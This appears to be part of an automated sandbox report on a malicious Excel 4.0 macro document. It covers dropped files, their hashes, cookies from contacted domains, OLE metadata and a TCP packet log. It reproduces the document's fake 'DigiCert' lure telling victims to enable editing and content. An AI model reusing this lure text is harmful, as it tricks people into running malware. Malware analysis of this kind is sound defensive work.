File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Fri Jan 22 23:44:42 2021, atime=Fri Jan 22 23:44:42 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4036
Entropy (8bit):	4.544906685401134
Encrypted:	false
SSDEEP:	96:8g/XLIns9e3Qh2g/XLIns9e3Qh2w/XLIns9e3Qh2w/XLIns9e3Q/:8CInJQECInJQEyInJQEyInJQ/
MD5:	B87F53D921186D4B748EC50E1762BAD4
SHA1:	D3EBC9C44FE2E1B34401CE35B479F35259927C0D
SHA-256:	787F27A7511EACBCC720CEB8E307DA39BB6C55774D8503F99AE2F937B998F9C7
SHA-512:	5AE4F1CCBF1537D5CC49799D37FF7B22217C5673A054FF4B3EDE8DE1AAA1089BEC343817E7EEAB506A5F2505116D0CA206D9D87B4CAF2BB0AFCF6D01A3B08E51
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....H...{...^U. ....Ea. ................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.!d..7R.. .CASE(6~1.XLS..H.......Q.y.Q.y...8.....................c.a.s.e. .(.6.1.)...x.l.s.......w...............-...8...[............?J......C:\Users\..#...................\\609290\Users.user\Desktop\case (61).xls.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.6.1.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......609290..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	162
Entropy (8bit):	4.459485550990895
Encrypted:	false
SSDEEP:	3:oyBVomMsZeIoZmMsZeIoZmMsZeIoZmMsZv:dj6tttY
MD5:	B9F88FA4D2DB8E93D022F4E47C1D0B4E
SHA1:	62AEF5C30BC47CF26CA70AFE16C35F82C632BB92
SHA-256:	25684D44FCBB13A8247F333D26EFD30C8B18443C2EF6E860388F46EC54F5D39C
SHA-512:	E13D2C0F2E3F1B17863460142CF250621B19F3528448E11A507B001A8A7C25B9244159AF15747B606980ACD77E1DF0ED7DA5666B81F27CF9FD63C7C0A5ADFDD8
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..case (61).LNK=0..case (61).LNK=0..[xls]..case (61).LNK=0..case (61).LNK=0..[xls]..case (61).LNK=0..case (61).LNK=0..[xls]..case (61).LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\1ON3M8YX.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	116
Entropy (8bit):	4.433448082320991
Encrypted:	false
SSDEEP:	3:GmM/xUHzGQXnbCHGUPWaKBoHdcSNrlQTU66RRv:XM/2JLCHDLKBtcQFCv
MD5:	070B4A91716E81C23DB5980DD5F48CE9
SHA1:	C814CED9C7C8951F8DFE2FBEC6EF676EF8DF1B0A
SHA-256:	AC77D8101A2E0EE7AAD46B93FD1546AB982AD5B6EC24E2CD83092E484D30333A
SHA-512:	EFAB51CE35E95075078A2562D2D9AF9CB1F8A49B40FF1D0A59C2F3C720CF84691EE009AA261DF57CC8B258114A33A676F9A927CAED3B0F15358C37B00F44AEE1
Malicious:	false
Reputation:	low
IE Cache URL:	forteanhub.com/
Preview:	__cfduid.db52d71bfb2c8725c8dfbc03e7488c4b21611330315.forteanhub.com/.9728.2349660032.30869608.3106872005.30863649.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\46C0Q9X3.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	118
Entropy (8bit):	4.4317252947105965
Encrypted:	false
SSDEEP:	3:GmM/mDIdyVAQTUGW1dhWXqRvcSNi9bQThsUcQtuTRv:XM/69VArX7lEdQNsFQtuTRv
MD5:	40D906CB7B8E6A8782F34FD4C885984F
SHA1:	7E8AE07763C78CEBD8224F73683720C90E67C0A0
SHA-256:	854A4CCABD70B0FE63B3C070AF1B214364685F523ED0E0B1C20F19773CBF9545
SHA-512:	E07A0AB70E20878FD78C8D62888D817808961B473427176765904ACBA0AA590B9996F8BD16E5DB49D2C7EA5130C5FA35BB7246EB33103679C6CEF26E6F88D4BE
Malicious:	false
Reputation:	low
IE Cache URL:	groceryasian.com/
Preview:	__cfduid.def8d31a89f0e569e76842c3adda8bd2f1611330314.groceryasian.com/.9728.2339660032.30869608.3079883958.30863649.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\COGJTIW2.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	121
Entropy (8bit):	4.4891406612201035
Encrypted:	false
SSDEEP:	3:GmM/5DWQREEbyX76qN0jbrtQTwjRv:XM/5DWQiEb46YIVQAv
MD5:	8294A80522287314586C14A9C38430D1
SHA1:	55DD2B864C2476AC2EF3D36BC0E3A3E39D7CF905
SHA-256:	3FA5FA828D91266DD4F5081B64F6FB73E9C30AC9162E9CA9BD22FCD1175459D0
SHA-512:	0A4221C79E6563BD3F84E08B4E566BE5EF59ECCA86E39886CDED759FFE318D50CDC5DF3EA1EB23A8621F8850D1207360CBD6096D8374575715A8BF40CF11FBFF
Malicious:	false
Reputation:	low
IE Cache URL:	conssapratigdevi.tk/
Preview:	__cfduid.d0b0112ddff39853cca8c07be82b96fa81611330317.conssapratigdevi.tk/.9728.2369660032.30869608.3114360019.30863649.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	119
Entropy (8bit):	4.503787433188678
Encrypted:	false
SSDEEP:	3:GmM/3SqXFdi4RUPU5M+RofvcSNPrtQTzRaOjW3:XM/fFIDj+fGtQ8Oq3
MD5:	C3519380022DBF4EC83B5513C1B0F5A5
SHA1:	4F09A63A9CAD0973E422CEC13D0FADF575462209
SHA-256:	4B6248F6BDB4641FBE8932EA50D96861E9C977396F8B3032FD198742413D532A
SHA-512:	18A0CAB669612882E4B50A389F8C84107D8FC8900A6E25F3AEEDC4CFC2D0F72A6A5FBFC8F8F3331739A128A5D0FD169BF6C180A86086B0F5CC04C8A02F1E73B5
Malicious:	false
Reputation:	low
IE Cache URL:	fortnitehecks.com/
Preview:	__cfduid.d0c385d92db857a584a07a66daf5d16b11611330280.fortnitehecks.com/.9728.1999660032.30869608.4042422661.30863648.*.

C:\Users\user\Desktop\80EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173169
Entropy (8bit):	7.740726306542508
Encrypted:	false
SSDEEP:	3072:T1J6AXTrAkTXXIW80T/R/XTyW80T/RDfW80T/RDN8FeS90FN8zewsrhJ6K:T1AgTrvHVhxTzhIhz8Fejf8zewsrhAK
MD5:	E23C9DBA5163345A741B57AB68D79BEE
SHA1:	676D84119F0290CE02EC0045CD087871C6C0635A
SHA-256:	FA87AF776E157DBDD755007A8D1F42B8D957C15207452E249021BEE157AEDF4E
SHA-512:	07B3ABB65074FD58F182D3C5F691FFAD4EDA9BFF953506B4DBC402BB3C2BEB77E64E3A3F770CDD3E5616ADACA411E32F18BB938FB219FF0F2ED20440D3DC7215
Malicious:	false
Reputation:	low
Preview:	........g2........../.........I..)?.1D..c!....N@3.B.#..+$ .....J.....:.].<.........g2........../.6.......I..)?.1D..c!....N@3.B.#..+$ .....J.....:.].<.................\.p....5...I...W..Res...YX.M.wv\|..\|.....I.Q.......,.aR.@...h&d.^D.F.x...b.j....?. ...<..v(.....i_..z..`.,vO.:?a\|B...oSa....k....=.@.....q....y)..}c.=...+..g.S....Q...B.."..zL.?$..R_c......&.;..........(......9...........@....gZ=...<.7b .2...l.d.:".p@.........+".....................A1...T.....H?F.4.?9..4.0...g.P....+1...N..(..P.z...t)1f.X.s...A....].1.......`.+...E.2..0.X.~....1...61.....m..s`I.!..Q.T/...T.GSa....$g1...2z.dx.^mD+..#`T_.._.x.........1....VbQd......,eSHQ.-.y......r.F1...23$....4o#m......K5 ..R..e.S..1..I`.HT K.p.q..7..........N.L....v.(...a1...G..{...j..}....O.H...e"....s1...._...5..f.......$..p.J....1.....o..O4...[C...n.].c.f..W..!&.1...........+.y.$..i"...F....p..a1.(..Z..po............7.$uj....../.m?..c.1.(.Z.:.....]..b..sg..i...".Q.\,..#Q...b1.....=A.i.....c..l....+..N

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Thu Jan 21 23:11:28 2021, Security: 1
Entropy (8bit):	6.45364547378633
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	case (61).xls
File size:	156705
MD5:	03cf3d0d50e14f5c65cc5582906b1bd4
SHA1:	491009b2f813c068e76c4931e8c3ad61e3d6e5ab
SHA256:	27077cd7478c8419d621656b3217aefebe4d7731d4741acedc99c9ce53fa6dbf
SHA512:	6326acd0ba1e2a34c5f732bf6b4a1fdb00a8f773524403da9ee95ec7b0a1d3fdeb820323668d12ba434592d6c557f656e707fd7e031e3922ae8e626a5ee82cb0
SSDEEP:	3072:xppdLdTb2doqmdPc2drdY0d6fAsls68LM:xppZdb2Fmlc2hBcfAsls6X
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "case (61).xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-21 23:11:28
Creating Application:	Microsoft Excel
Security:	1

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.838769798021
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.329149249915
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . g j . . . @ . . . . P 2 . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 10 00 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145744

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145744
Entropy:	6.58030604443
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . T . . / . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . U . : . . ^ # . . . . W * . . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j . . . o . . . . . f . m . d . j B . . . b c . . . . . ` . . . . . k . . . . C ~ j . . . . x . R . . * . . . . ! . . i . @ . n . . . k . . . . % % . . . ` . n . . . k . . . . . b . . . . . . . . . . . > . . . . . . 9 = . . . x .
Data Raw:	09 08 08 00 00 05 05 00 0a 54 cd 07 2f 00 04 00 59 b3 0a 9a e1 00 00 00 c1 00 02 00 94 04 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 55 1c 3a f7 84 5e 23 e7 bd 1f 03 57 2a dc c4 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00 83 6f 9e e6 1a e7 01 66 1a 6d 92 64 9c 6a 90 00

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,   FOLLOW THIS STEPS TO DECRYPT DOCUMENT ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"     1.Read the privacy policy  www.digicert.com/faq/.",,,,,,,,,,,,,,,,,,,,,,,,,,,,    2. ?li?k ?'!n?b!l? ?diting  on the yellow bar if the document was downloaded from the Internet.,,,,,,,,,,,,,,,,,,,,,,,,,,,,    3.  Click ?n?!ble c?nt?nt on the yellow bar to run plugin Core decryption.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,                           PKI SYSTEM DOCUMENT PROTECTION,,,,,                                                                                           ,,,"2021 D'igiCert, Inc. All rights reserved.                                                                                             ",,,,,,,,ID: e087707be4830feba9,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,by AsHkERE ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2021 16:44:40.417735100 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.457776070 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.459470987 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.473887920 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.513854027 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.516252995 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.516279936 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.516423941 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.534096003 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.574052095 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.574117899 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.574209929 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.803843021 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.843871117 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993366957 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993412971 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993429899 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993446112 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993468046 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993489027 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993505955 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993527889 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993556023 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993572950 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993590117 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993594885 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993614912 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993616104 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993628979 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993642092 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993647099 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993664026 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993683100 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993686914 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993699074 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993706942 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993715048 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993725061 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:40.993741035 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:40.993755102 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.005665064 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.016551018 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.016577005 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.016674995 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063132048 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063158035 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063178062 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063191891 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063213110 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063239098 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063256979 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063258886 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063273907 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063280106 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063293934 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063302994 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063324928 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063328981 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063338995 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063353062 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063353062 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063369989 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063406944 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063479900 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063502073 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063520908 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063527107 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063543081 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063553095 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063556910 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063576937 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063587904 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063600063 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063601971 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063620090 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063630104 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063702106 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063899994 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063935041 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.063940048 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063965082 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.063983917 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.064008951 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.064019918 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.064027071 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.064062119 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.064289093 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.114078045 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.114101887 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.114195108 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.132841110 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132863998 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132880926 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132898092 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132910967 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132926941 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132946968 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132965088 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.132987022 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133002043 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133061886 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133096933 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133203983 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133229017 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133251905 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133272886 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133275986 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133299112 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133308887 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133325100 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133347034 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133348942 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133378029 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133392096 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133431911 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133445024 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133466005 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133474112 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133497953 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133517981 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133519888 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133533955 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133578062 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133886099 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133907080 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133923054 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133938074 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133940935 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133959055 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133970022 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.133979082 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.133999109 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.134002924 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.134016037 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.134028912 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.134038925 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.134057045 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.134068966 CET	49165	443	192.168.2.22	104.21.23.220
Jan 22, 2021 16:44:41.134073973 CET	443	49165	104.21.23.220	192.168.2.22
Jan 22, 2021 16:44:41.134092093 CET	443	49165	104.21.23.220	192.168.2.22
